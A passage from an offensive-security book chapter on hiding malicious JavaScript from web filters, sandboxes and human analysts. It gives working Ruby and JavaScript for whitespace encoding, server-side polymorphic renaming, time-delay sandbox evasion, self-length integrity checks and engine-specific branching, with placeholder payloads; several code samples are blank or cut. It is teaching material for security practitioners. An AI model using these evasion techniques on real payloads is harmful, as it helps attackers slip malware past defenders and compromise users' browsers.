Packing and minifying of JavaScript can also be useful to evade detection, especially if combined with random variables and other techniques described in the following sections. The process of minifying involves removing all the unnecessary characters from your code without impacting its ability to run. Packing, on the other hand, is more analogous to compression, and often involves shortening variable names and other function calls. Consider the following code snippet, which is analyzed further in the “Random Variables and Methods” section:

    var malware = {
        version: '0.0.1-alpha',
        exploits: new Array("", ""),
        persistent: true
    };
    window.malware = malware;
    function redirect_to_site(){
        window.location = window.malware.exploits[0];
    }
    redirect_to_site();

After packing this code with Dean Edwards’ Packer [17], the result will be:

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};


k=[function(e){return r[e]}];e=function(){return'\\w+'};

c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+

'\\b','g'),k[c]);return p}('b 2={7:\'0.0.1-i\',4:8 9(

"a://6.c/d.e",""),f:g};3.2=2;h 5(){3.j=3.2.4[0]};5();',




As you can see, function and variable names like malware, window, and exploits are still very clear at the bottom of the snippet. The following is the same code, but packed after randomizing variable and method names:

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};


k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};

while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+

'\\b','g'),k[c]);return p}('h 1={a:\'f\',3:6 7(

"8://9.5/b.c",""),d:e};2.1=1;g 4(){2.i=2.1.3[0]};




You can clearly see the difference between the two packed snippets.

Whitespace Encoding

A very crafty encoding technique, presented by Kolisar at DEFCON 16, is WhiteSpace encoding [18]. The idea behind this technique is to binary-encode ASCII values using whitespace characters. If you map the Tab character to 0 and the Space character to 1, you can encode your data with just these two characters. The result is nothing but whitespace, hence the name of the technique. A lot of automated de-obfuscation tools ignore whitespace, so this technique comes in handy to make de-obfuscation more difficult.

You can use this sample Ruby implementation to generate the encoded JavaScript before using it in your attacks:

def whitespace_encode(input)

# 'B*' returns the bits of every byte, most significant bit first

bits = input.unpack1('B*')

# map 0 to Tab and 1 to Space

bits.tr('01', "\t ")

end

encoded = whitespace_encode("alert(1)")

File.open("whitespace_out.js", 'w'){|f| f.write(encoded)}

As you can see, input into the whitespace_encode() function is converted to a binary representation, then 0 is mapped to Tab and 1 is mapped to Space. The result is written to a new file, enabling you to copy and paste it more easily. The code needs a boot-strapper in order to properly decode and evaluate the input. The following JavaScript implementation includes the whitespace_encoded variable from earlier:

// The Tab characters are unlikely to survive

// if you copy and paste the code from here,

// so make sure you test the code snippet.

var whitespace_encoded = " ";

function decode_whitespace(css_space) {

var spacer = '';

for(var y = 0; y < css_space.length/8; y++){

var v = 0;

for(var x = 0; x < 8; x++){

// a Space (char code 32) is a 1 bit, a Tab (char code 9) is a 0 bit

if(css_space.charCodeAt(x+(y*8)) > 9){

v++;

}

if(x != 7){

v = v << 1;

}

}

spacer += String.fromCharCode(v);

}

return spacer;

}

var decoded = decode_whitespace(whitespace_encoded);

// evaluate the decoded string

setTimeout(decoded);

The decode_whitespace function decodes the content of the whitespace_encoded variable, which contains the whitespace generated by the previous Ruby script. The decoding process reconstructs the data byte by byte: each group of eight whitespace characters becomes one character code, and String.fromCharCode turns that code back into a character of the original string. Finally, the decoded string is passed to setTimeout, which evaluates and executes it.
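The whole scheme can also be sketched as a round trip in JavaScript alone. This is a minimal sketch, assuming input characters with codes below 256; the encodeWhitespace() and decodeWhitespace() names are hypothetical and are not part of Kolisar's original implementation.

```javascript
// Tab encodes a 0 bit and Space encodes a 1 bit, as described in the text.
// Assumption: every character code fits in 8 bits.
function encodeWhitespace(text) {
  let out = "";
  for (let i = 0; i < text.length; i++) {
    const bits = text.charCodeAt(i).toString(2).padStart(8, "0");
    out += bits.replace(/0/g, "\t").replace(/1/g, " ");
  }
  return out;
}

// Rebuild each byte from eight whitespace characters, most significant bit first.
function decodeWhitespace(encoded) {
  let out = "";
  for (let i = 0; i + 8 <= encoded.length; i += 8) {
    let value = 0;
    for (let bit = 0; bit < 8; bit++) {
      value = (value << 1) | (encoded.charAt(i + bit) === " " ? 1 : 0);
    }
    out += String.fromCharCode(value);
  }
  return out;
}

const encodedPayload = encodeWhitespace("alert(1)");
console.log(encodedPayload.length);             // 8 characters * 8 bits
console.log(decodeWhitespace(encodedPayload));  // the original string
```

Generating the string programmatically in this way sidesteps the copy-and-paste problem with Tab characters mentioned in the code comments.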

As you can see in Figure 3-15, the decoded source code (alert(1)) is evaluated using a setTimeout() call.

Figure 3-15: An example of the WhiteSpace encoding technique


Non-alphanumeric JavaScript

Believe it or not, the flexibility of the JavaScript language enables you to encode data without using any alphanumeric characters. In 2009, Yosuke Hasegawa, a security researcher from Japan, found a way to encode JavaScript code using only symbols—for example, [],$_+:~{} and a few others.

An in-depth analysis of how this technique works would probably require an entire chapter, so if you want to delve deeper into the topic, refer to the following references and whitepapers. One of the ways to encode data using non-alphanumeric JavaScript is JJencode, whose de-obfuscation has been analyzed by Peter Ferrie.19 Another useful resource on obfuscation is the Web Application Obfuscation book.20

Non-alphanumeric JavaScript relies heavily on JavaScript’s implicit type conversion, which isn’t often found in strongly typed languages such as Java or C++. A few basic concepts that underpin this style of JavaScript are presented here.

First, in JavaScript you can cast a variable to a String representation by concatenating it with an empty string:

1+"" //returns "1"

Second, you have many different ways to return a Boolean value from just symbols. For example, with an empty array, empty objects, or simply an empty string:

![] //returns false

!{} //returns false

!"" //returns true

Given this behavior, you can easily construct strings. For instance, to construct the string “false”, you can use the following code:

[![]]+[] //returns "false"

You first start with an empty array [], you negate it using !, and you have a Boolean false. Then, wrapping it inside another empty array and concatenating it with yet another empty array, you obtain the string “false”. Now that you can create arbitrary strings, you need to get a reference to window.

An old example, which used to work in Firefox, is the following:


An updated example that still works in Chrome, is the following:


Both the previous examples rely on either the sort or concat functions returning window, because they don’t know which array is referenced.

At this stage you can create arbitrary strings and get a reference to window, so you can call static methods such as window.alert and others, but you need some more trickery to evaluate code. Various ways to achieve that have been discussed previously, but still one of the shortest methods is by using constructor:

[].constructor.constructor("alert(1)")()

If you access the constructor two times from an array object, you get Function. From there, you can pass strings of arbitrary code to be evaluated, such as “alert(1)”.
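The building blocks described above can be checked one at a time. The following is a minimal sketch; the variable names are only there for readability (a real non-alphanumeric payload would inline every expression), and the string "return 1+1" stands in for the code you would normally assemble from symbols.

```javascript
// Strings obtained purely through type coercion.
const falseString = [![]] + [];        // "false"
const trueString = !"" + [];           // "true"
const undefinedString = [][[]] + [];   // "undefined"

// Numbers obtained the same way, used here to index into the strings.
const zero = +[];                      // 0
const one = +!![];                     // 1
const two = one + one;
const four = two + two;

// Individual letters can be picked out and joined into new words.
const word = falseString[one] + falseString[two] + falseString[four] +
             trueString[one] + trueString[zero];   // "alert"

// Accessing constructor twice from an array yields Function.
const FunctionConstructor = [].constructor.constructor;
const evaluated = FunctionConstructor("return 1+1")();

console.log(word, FunctionConstructor === Function, evaluated);
```

Every right-hand side in the first two groups uses only symbols, which is the property that tools such as JJencode exploit at scale.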

A number of tools exist that can assist with the generation of non-alphanumeric JavaScript, including JJencode21 and AAencode,22 both from Yosuke Hasegawa. AAencode even demonstrates how you can encode JavaScript with Japanese style emoticon characters. An example of alert(1) encoded with JJencode is the following:










As you can see, the number of characters needed to encode a short function such as alert(1) is quite large. This makes this encoding technique very interesting but not always effective if you need to encode hundreds of lines of JavaScript. Regardless of its applicability, it’s useful to have another encoding technique available to you to hide small pieces of code.

The original JJencode idea from Yosuke piqued the interest of the security industry, leading to further experiments in the field and eventually to the creation of the Diminutive NoAlNum JS Contest,23 hosted on a site run by Robert Hansen.

Evasion using Obfuscation

The previous sections have demonstrated how encoding works, and how it comes in handy when hiding your JavaScript code. Obfuscation is another method to hide your code, and when combined with encoding, can become a very effective way to bypass network filters. These techniques are common in the wild; exploit kits such as BlackHole24 often deliver client-side attacks using obfuscated and encoded JavaScript payloads. The following sections examine various techniques to help make your code less detectable.

Random Variables and Methods

If you are a developer, you know that writing clear and maintainable code is a priority. The following code is very easy to read thanks to the self-explanatory nature of its variables and method names. A new object, malware, is created, with various properties. The malware object is then attached to the window object, and the redirect_to_site() function is called, which will redirect the browser to the first URL in the exploits array.

var malware = {

version: '0.0.1-alpha',

exploits: new Array("",""),

persistent: true

};

window.malware = malware;

function redirect_to_site(){

window.location = window.malware.exploits[0];

}

redirect_to_site();

Now imagine there is a network filtering solution that inspects traffic with a regular expression filter searching for malware, the version number, redirect_to_site(), or other function names. This is more common than you might imagine, and it can be effective if server-side code polymorphism is not used.
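The effect of renaming on such a filter can be sketched in a few lines. This is a minimal sketch under stated assumptions: the signature regular expression is a hypothetical stand-in for whatever a real filter uses, and randomName() and randomize() are illustrative helpers rather than part of any tool.

```javascript
// Hypothetical signature a naive network filter might search for.
const signature = /malware|redirect_to_site|0\.0\.1-alpha/;

// Random identifier built from letters and underscore only.
function randomName(length) {
  const chars = "abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ_";
  let name = "";
  for (let i = 0; i < length; i++) {
    name += chars[Math.floor(Math.random() * chars.length)];
  }
  return name;
}

// Replace every occurrence of each listed name with one fresh random name.
function randomize(code, names) {
  let result = code;
  for (const name of names) {
    result = result.split(name).join(randomName(8));
  }
  return result;
}

const original =
  "var malware = { version: '0.0.1-alpha' };" +
  "function redirect_to_site(){ window.location = window.malware.exploits[0]; }";
const renamed = randomize(original, ["malware", "redirect_to_site", "0.0.1-alpha"]);

console.log(signature.test(original)); // the readable code matches the signature
console.log(signature.test(renamed));  // the renamed code does not
```

Because the random alphabet omits digits and the letter l, none of the generated names can reintroduce the strings the signature looks for.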

Server-side Polymorphism

Mainly exploited by malware, this technique changes the code in such a way that it’s difficult to mark it as malicious based on static signatures.25 The code is also changed per hook, meaning that if the same malware infects two machines, the two copies will differ when compared while retaining the same functionality.

Achieving basic server-side code polymorphism is not too difficult. The following simple demonstration uses a Hash data structure per hooked browser (if you want to achieve per-session polymorphism), where original values and randomized values are stored for future reference. The following Ruby code is an example:

code = <<EOF

var malware = {

version: '0.0.1-alpha',

exploits: new Array("",""),

persistent: true

};

window.malware = malware;

function redirect_to_site(){

window.location = window.malware.exploits[0];

}

redirect_to_site();

EOF

def rnd(length=5)

chars = 'abcdefghjkmnpqrstuvwxyzABCDEFGHJKLMNPQRSTUVWXYZ_'

result = ''

length.times { result << chars[rand(chars.size)] }

result

end

lookup = {

"malware" => rnd(7),

"exploits" => rnd(),

"version" => rnd(),

"persistent" => rnd(12),

"0.0.1-alpha" => rnd(10),

"redirect_to_site" => rnd(4)


}

lookup.each do |key,value|

# gsub! returns nil when nothing is replaced, so use gsub instead

code = code.gsub(key, value)

end

File.open("result.js", 'w'){|f|f.write(code)}

Every time you call the preceding code (for instance, when you hook a new browser), the JavaScript code in result.js will be different. For example:

var uxGfLVC = {

sXCrv: 'ZEpXkhxSMz',

egCSx: new Array("",""),

LctUZLQnJ_gp: true

};

window.uxGfLVC = uxGfLVC;

function HrhB(){

window.location = window.uxGfLVC.egCSx[0];

}

HrhB();

The randomized variable and function names in the previous example do not take scope into consideration. If scope is considered, the resulting code will be more difficult for a human to analyze. Suppose that the previous code contained another function called execute(), and redirect_to_site() accepted an input parameter:

function execute(cmd){



function redirect_to_site(input){


window.location = window.malware.exploits[0];



Obfuscating the example considering scope this time would result in the following code. It is less readable for humans because they may incorrectly conclude the same global variables are used across multiple functions.

function gSYYtNBjNFbZ(napSj){



function HrhB(napSj){


window.location = window.uxGfLVC.egCSx[0];



Mixing Object Notations

If you review a lot of JavaScript code, you are probably more accustomed to seeing properties accessed with the Dot notation than with the Bracket notation.26 As far as the language is concerned, the two styles are largely equivalent.

The previous code snippets used the Dot notation. For example, the following expression accesses the window object, then the malware object, and finally a property of the malware object:

window.malware.exploits[0]

The same code with Bracket notation is as follows:

window['malware']['exploits'][0]

Mixing the two notations you can write perfectly valid code like this:

window['malware'].exploits[0]

Expanding this, you can combine this technique with the examples from the previous sections, including base64 encoding, to create the following:

var uxGfLVC = {

sXCrv: 'ZEpXkhxSMz',

egCSx: new Array("\x68\x74\x74\x70\x3A\x2F\x2F"+




LctUZLQnJ_gp: true


window['uxGfLVC'] = uxGfLVC;

function HrhB(){


/ution/,'tion')] = window.uxGfLVC['egC'+




You can clearly (or unclearly) see how the code is less readable using a mix of Dot and Bracket notation.

Arrays are commonly queried using array[index] or array['string_element']. Looking at code from the previous example, where object methods or properties are accessed the same way, combined with non-meaningful variable names, you might think those brackets are used to get items from data structures. This is, of course, not the case, but just what you want to achieve: confusion. This confusion is directed not only at the human analyst, but potentially a network filtering solution as well.
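The equivalence of the two notations is easy to verify. In this minimal sketch the holder object is a hypothetical stand-in for window, so that the code also runs outside a browser, and the sample strings are placeholders.

```javascript
// 'holder' stands in for the browser's window object (assumption for portability).
const holder = { malware: { exploits: ["first", "second"] } };

// Dot notation, Bracket notation, and a mix of the two.
const viaDot = holder.malware.exploits[0];
const viaBracket = holder["malware"]["exploits"][0];
const viaMixed = holder["malware"].exploits[0];

// Bracket notation accepts any expression that evaluates to the property name,
// so the name never has to appear literally in the source.
const viaComputed = holder["mal" + "ware"]["explXoits".replace(/X/, "")][0];

console.log(viaDot, viaBracket, viaMixed, viaComputed);
```

The last form is the one that matters for evasion: a filter searching for the literal property names will not find them.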

Time Delays

Time-based checks are another method in which malware can attempt to evade emulation. Malware detection technology often emulates JavaScript engines, particularly those that may be present in a WAF or proxy. Unfortunately, these engines often ignore setTimeout() or setInterval() delays for performance reasons. An inline networking proxy solution that is checking for JavaScript-borne malware is unlikely to wait for 30 seconds, to the detriment of the user.

This kind of behavior can be exploited by implementing logic that will voluntarily delay execution, for example with setTimeout(). Functions that are called after the elapsed time can also check the Date() object to see if the expected delay was respected. If it’s not, the decryption routine needed to execute the real malicious code is not triggered. These techniques, while effective against automated analysis of potentially malicious JavaScript, may not necessarily avoid detection by a human. An example is the following:

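var timeout = 10000;

var interval = new Date().getSeconds();

var key;

function timer(){

var s_interval = new Date().getSeconds();

var diff = s_interval - interval;

// getSeconds() wraps at 60, so a 10-second delay that crosses

// a minute boundary gives a difference of -50

if(diff == 10) key = diff + "aaa";

if(diff == -50) key = diff + "bbb";

// only run the decryption routine if the delay was respected

if(key) decrypt(key);

}

function decrypt(key){

// decryption routine

}

setTimeout(timer, timeout);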

The timer() function is called after a 10-second delay. When the program flow enters that function, a check is made to see if 10 seconds have actually passed. If the expected time delay is verified, the key for the decryption routine is created, and the decryption routine is called. If the preceding code is obfuscated, and different time delays are applied to multiple parts of it, it becomes trickier to analyze. This technique comes in handy, as most JavaScript sandboxes used for malware analysis have fixed timeouts, after which they give up analyzing the obfuscated code.
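A variation on the same check compares millisecond timestamps instead of the seconds field, which avoids having to reason about minute boundaries. This is a minimal sketch; delayWasRespected(), runAfterVerifiedDelay(), and the 50-millisecond tolerance are assumptions made for illustration.

```javascript
// Returns true only if at least expectedMs (minus a small tolerance)
// separates the two millisecond timestamps.
function delayWasRespected(startMs, nowMs, expectedMs, toleranceMs) {
  return nowMs - startMs >= expectedMs - toleranceMs;
}

// Schedules action after delayMs, but runs it only if the delay really elapsed.
// An emulator that fires timers immediately fails the check.
function runAfterVerifiedDelay(delayMs, action) {
  const startMs = Date.now();
  setTimeout(function () {
    if (delayWasRespected(startMs, Date.now(), delayMs, 50)) {
      action();
    }
  }, delayMs);
}

console.log(delayWasRespected(0, 10000, 10000, 50)); // full delay observed
console.log(delayWasRespected(0, 3, 10000, 50));     // timer fired too early
```

A call such as runAfterVerifiedDelay(10000, someRoutine) would then mirror the 10-second example above, with someRoutine being whatever function should only run on a real browser.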

Mixing Content from Another Context

Another method to obfuscate JavaScript is by mixing contexts. When a human is de-obfuscating JavaScript, the first thing they may look at is the JavaScript code itself, which we would consider a single context. Imagine if the code was broken up into multiple parts, or contexts, and each part needs information from different contexts in order to function. The following code calls the decrypt() function, passing as its parameter the concatenation of two String objects. The first string comes from the DOM:


<div id="hidden_div">




The second string comes from the fragment identifier of the page URI:

function decrypt(key){

// decryption routine

}


var key = document.getElementById('hidden_div').innerHTML;

var key2 = location.href.split("#")[1];

decrypt(key + key2);

If a human analyst de-obfuscates just the script itself, the result will be incomplete, because part of the key lives outside the script. The results of using this technique can be seen in Figure 3-16:

Figure 3-16: Obfuscating code mixing two different contexts


The same concept can be extended to different contexts, not only the DOM. PDF files, Flash content, and Java Applets are all callable from JavaScript, so pieces of information can be pulled in from multiple disparate contexts.
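The dependency on several contexts can be made explicit by passing them in as parameters. The following is a minimal sketch: assembleKey() is a hypothetical helper, and fakeDocument and fakeLocation are stand-ins for the browser's document and location objects, with placeholder values, so that the example runs outside a browser.

```javascript
// Builds the key from two contexts: an element in the DOM and the URI fragment.
function assembleKey(doc, loc) {
  const fromDom = doc.getElementById("hidden_div").innerHTML;
  const fromUri = loc.href.split("#")[1] || "";
  return fromDom + fromUri;
}

// Stand-ins for the browser objects (assumptions for illustration only).
const fakeDocument = {
  getElementById: function (id) {
    return id === "hidden_div" ? { innerHTML: "part-one-" } : null;
  }
};
const fakeLocation = { href: "http://example.com/page.html#part-two" };

console.log(assembleKey(fakeDocument, fakeLocation));
// An analyst who captures only the script, without the page and the full URI,
// cannot reproduce the key.
console.log(assembleKey(fakeDocument, { href: "http://example.com/page.html" }));
```

In a real page you would call assembleKey(document, location) and hand the result to the decryption routine.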

Using the callee Property

In JavaScript, if arguments.callee is accessed inside a function, it returns the function itself. This is sometimes useful when writing anonymous recursive functions. Unfortunately, arguments.callee is deprecated, and accessing it throws an error in ECMAScript 5 strict mode.

The fact the function itself is returned by arguments.callee can be exploited to make de-obfuscation trickier. Imagine the function is performing a check on the code length of itself. If this check fails, parts of the code will not be executed. If someone is manually evaluating the code, by changing it, this check will likely fail. This is common when manually reviewing obfuscated code. For example, nested eval() calls might be replaced with helper functions such as console.log() or custom printing functions, to better understand the code before it’s being evaluated.

If such an approach is used inside an obfuscated function that relies on arguments.callee to check its own length, the part of the sample that contains the malicious code may never get executed. When such obfuscated code gets modified during manual analysis, but the expected code length is not updated, the malicious code will simply not run. To better understand how this works, a Ruby implementation of this technique is shown here:

placeholder = "XXXXXX"

code = <<EOF

function boot(){

var key = arguments.callee.toString().replace(/\\W/g,"");

console.log(key.length);

if(key.length == #{placeholder}){

console.log("verification OK");

//... malicious code here

}else{

console.log("verification FAIL");

//... dead code here

}

}

EOF

code_length = code.gsub(/\W/,"").length

# XXXXXX -> 6 chars

digits = code_length.to_s.length # returns the number of integer digits

if(digits >= placeholder.length)

to_add = digits - placeholder.length

final_code = code.gsub(placeholder , (code_length + to_add).to_s)

else

to_remove = placeholder.length - digits

final_code = code.gsub(placeholder , (code_length - to_remove).to_s)

end

File.open("result.js", 'w'){|f|f.write(final_code)}

The resulting JavaScript will be written to result.js, and looks like this:

function boot(){

var key = arguments.callee.toString().replace(/\W/g,"");

console.log(key.length);

if(key.length == 166){

console.log("verification OK");

//... malicious code here

}else{

console.log("verification FAIL");

//... dead code here

}

}

For the sake of the example, the code itself is not obfuscated, nor is the 166 Integer calculated through the Ruby script, but they can both easily be obfuscated with one of the many techniques described earlier. For example, after adapting the previous Ruby code, you might want to replace 166 with:

parseInt(document.getElementById('hidden_div').innerHTML, 10) +

parseInt(atob(location.href.split("#")[1]), 10)

The document.getElementById() function will retrieve the element with an ID of hidden_div from the current document, whose content may be 160. The second part will retrieve the base64-encoded content after the fragment identifier of the current URI, decode it, and return the value (that is, 6). Summing these together as integers will result in 166. This is a very simple example of how you can combine different encoding and obfuscation techniques. Layering and chaining some of the techniques presented so far will assist you with hiding your JavaScript code from automated and manual analysis.
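The self-check can also be generated and exercised entirely in JavaScript. This is a minimal sketch, not the Ruby script above: it builds the function with the Function constructor (whose body is not in strict mode, so arguments.callee is available), and the PLACEHOLDER token, strippedLength(), and buildBody() are assumptions made for illustration.

```javascript
// Body of the self-checking function; PLACEHOLDER is patched in below.
const template =
  'var key = arguments.callee.toString().replace(/\\W/g, "");' +
  'return key.length === PLACEHOLDER ? "verification OK" : "verification FAIL";';

// Length of a function's source once non-word characters are stripped.
function strippedLength(body) {
  return new Function(body).toString().replace(/\W/g, "").length;
}

// The expected length is itself part of the source, so iterate until it is stable.
function buildBody() {
  let expected = 0;
  for (let i = 0; i < 10; i++) {
    const length = strippedLength(template.replace("PLACEHOLDER", String(expected)));
    if (length === expected) {
      return template.replace("PLACEHOLDER", String(expected));
    }
    expected = length;
  }
  throw new Error("length did not stabilise");
}

const body = buildBody();
const intact = new Function(body);
// Simulate an analyst adding a logging statement to the function.
const tampered = new Function('console.log("analyst was here");' + body);

console.log(intact());   // the untouched function passes its own check
console.log(tampered()); // the modified function fails it
```

The iteration in buildBody() plays the role of the digit-count adjustment in the Ruby script: writing the number into the source changes the length being measured.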

Evasion using JavaScript Engine Quirks

If you know which rendering engine you want to target, you can refine your obfuscation techniques to make de-obfuscation trickier by using JavaScript quirks between different rendering engines. These quirks can be abused to allow your code to follow a different path, depending on which JavaScript engine you use while de-obfuscating it.

For instance, Trident (Internet Explorer’s engine) returns true if the following code is evaluated. Gecko and WebKit, on the other hand, return false.


Another similar trick to identify Internet Explorer is by using conditional comments, which work only on IE. The following snippet is a very simple example of how the Boolean negation ! is applied only if conditional comments are enabled with @cc_on:

var is_ie = /*@cc_on!@*/false;

If the code is evaluated by IE, it will be effectively interpreted as !false, resulting in the is_ie variable being true. In every other browser, the variable will be false because the Boolean negation will be considered just a code comment.

Now imagine you are targeting Internet Explorer and the server-side HTTP filtering engine uses SpiderMonkey (the JavaScript engine used by Firefox). If the filtering engine (using SpiderMonkey) evaluates the following code, the flow will always end up in the else block:

if(is_ie){

... // Malicious code for IE browser

}else{

... // Dead and Not-Malicious code for non-IE browsers

}

The filtering engine will parse the code in the else statement and diagnose it as not malicious. The whole JavaScript content will be allowed by the proxy, and will then be potentially executed by an Internet Explorer browser. This time though, the logic flow that gets followed leads to the malicious code.

The same concept applies while manually de-obfuscating the code, in case the evaluation is done within a browser or other tools that rely on a particular JavaScript engine. The example can be flipped the other way around depending on what filtering solution you want to bypass, but the concept remains the same.
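You can observe the non-IE side of this behavior in any engine that does not implement conditional compilation. The following minimal sketch uses a hypothetical selectBranch() helper that returns a label instead of running any code, purely to show which path an engine would follow.

```javascript
// Engines without conditional compilation treat /*@cc_on!@*/ as a plain comment,
// so the negation never happens and the value stays false.
var isIe = /*@cc_on!@*/false;

// Returns a label for the path that would be followed.
function selectBranch(flag) {
  return flag ? "ie-branch" : "other-branch";
}

console.log(isIe);                 // false outside Internet Explorer
console.log(selectBranch(isIe));   // the path an emulating filter would inspect
console.log(selectBranch(true));   // the path an IE target would follow
```

Run in SpiderMonkey, V8, or a similar engine, only the harmless path is ever taken, which is exactly what the filtering scenario above relies on.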


Summary

In this chapter, you have examined why retaining control is fundamental for browser hacking. Establishing a communication channel and persisting your control are crucial if you want to be successful when compromising your target.

Various techniques to achieve communication and persistence have been presented, and it’s now up to you to decide which method to use, or perhaps a combination of them, to achieve the best result. One possibility is that when communicating to the browser you might opt for a standard XMLHttpRequest communication channel. Then you might get it to automatically upgrade to the WebSocket protocol if supported. Further, you might then achieve persistence by combining IFrames and pop-unders. The best option will depend a lot on your specific attacking scenario.

Retaining control of the target browser will give you the opportunity to modularize the different attack code and make real-time decisions. This gives you the option of an attacker’s feedback loop. A particular action may unveil a subsequent issue, which when further investigated may expose more issues. Using this method you can choose which branch of the decision tree to go down as it presents itself. For example, you might identify all active hosts on the target browser’s local network and then choose only these to port scan.

You’ve also examined various techniques to minimize the likelihood your instructions are blocked by filters. Using these methods your code might even be too obscure for simple manual analysis. Of course, this will depend on the sophistication of your obfuscation and the sophistication of your target.

You have explored many techniques that you can use to retain control of your target browser. You are now ready to bend the browser’s functionality against itself. Let’s jump straight into the following chapters that focus on attacking the browser.


Questions

1. What are the advantages of using the WebSocket protocol instead of an XMLHttpRequest channel?

2. Describe how a DNS-based channel works, and why it’s good to have a stealthy communication.

3. What is hooking a browser?

4. Why can Man-in-the-Browser be effective in situations when IFrames cannot be used?

5. How does the WhiteSpace encoding evasion technique work?

6. Imagine an environment where you have a network protected by a web filtering solution. Which evasion techniques would you use? How would you combine them?

7. Why would a time delay evasion technique be effective against Malware detection technologies?

8. Give an example of hijacking a DOM event.

9. What is the most reliable persistence technique in your opinion? Would you combine some of the techniques discussed previously?

10. What does the following encoded string do? You can download the code from




















For answers to the questions, please refer to the book’s website or the Wiley website.


Notes

1. Mayhem. (2001). IA32 Advanced Function Hooking. Retrieved March 8, 2013.

2. (2013). WebRTC. Retrieved March 8, 2013.

3. Mozilla. (2013). Closures. Retrieved March 8, 2013.

4. Eric Law. (2010). XDomainRequest - Restrictions, Limitations and Workarounds. Retrieved March 8, 2013.

5. Alex Russell. (2006). Comet: Low Latency Data for the Browser. Retrieved March 8, 2013.

6. (2012). Retrieved March 8, 2013.

7. Ilya Grigorik. (2009). EventMachine based WebSocket server. Retrieved March 8, 2013.

8. EventMachine Team. (2008). EventMachine. Retrieved March 8, 2013.

9. Opera. (2012). An Introduction to HTML5 web messaging. Retrieved March 8, 2013.

10. I. Fette and A. Melnikov. (2011). The WebSocket Protocol. Retrieved March 8, 2013.

11. Securitywire. (2010). Iodine rules. Retrieved March 8, 2013.

12. Kenton Born. (2010). Browser-based Covert Data Exfiltration. Retrieved March 8, 2013.

13. Mozilla. (2013). Manipulating the browser history. Retrieved March 8, 2013.

14. Hans-Peter Buniat. (2012). jQuery pop-under. Retrieved March 8, 2013.

15. IOActive. (2012). Reversal and Analysis of Zeus and SpyEye Banking Trojans. Retrieved March 8, 2013.

16. Mozilla. (2013). EventTarget. Retrieved March 8, 2013.

17. Dean Edwards. (2010). Packer. Retrieved March 8, 2013.

18. Kolisar. (2008). WhiteSpace: A Different Approach to JavaScript Obfuscation. Retrieved March 8, 2013.

19. Peter Ferrie. (2011). Malware Analysis. Retrieved March 8, 2013.

20. Mario Heiderich, Eduardo Alberto Vela Nava, Gareth Heyes, and David Lindsay. (2011). Web Application Obfuscation. Retrieved March 8, 2013.

21. Yosuke Hasegawa. (2009). JJEncode. Retrieved March 8, 2013.

22. Yosuke Hasegawa. (2009). AAEncode. Retrieved March 8, 2013.

23. (2009). Diminutive NoAlNum JS Contest. Retrieved March 8, 2013.

24. Fraser Howard. (2012). Exploring the Blackhole exploit kit. Retrieved March 8, 2013.

25. Graham Cluley. (2012). Server-side polymorphism: How mutating web malware tries to defeat anti-virus software. Retrieved March 8, 2013.

26. Mozilla. (2010). Property Accessors. Retrieved March 8, 2013.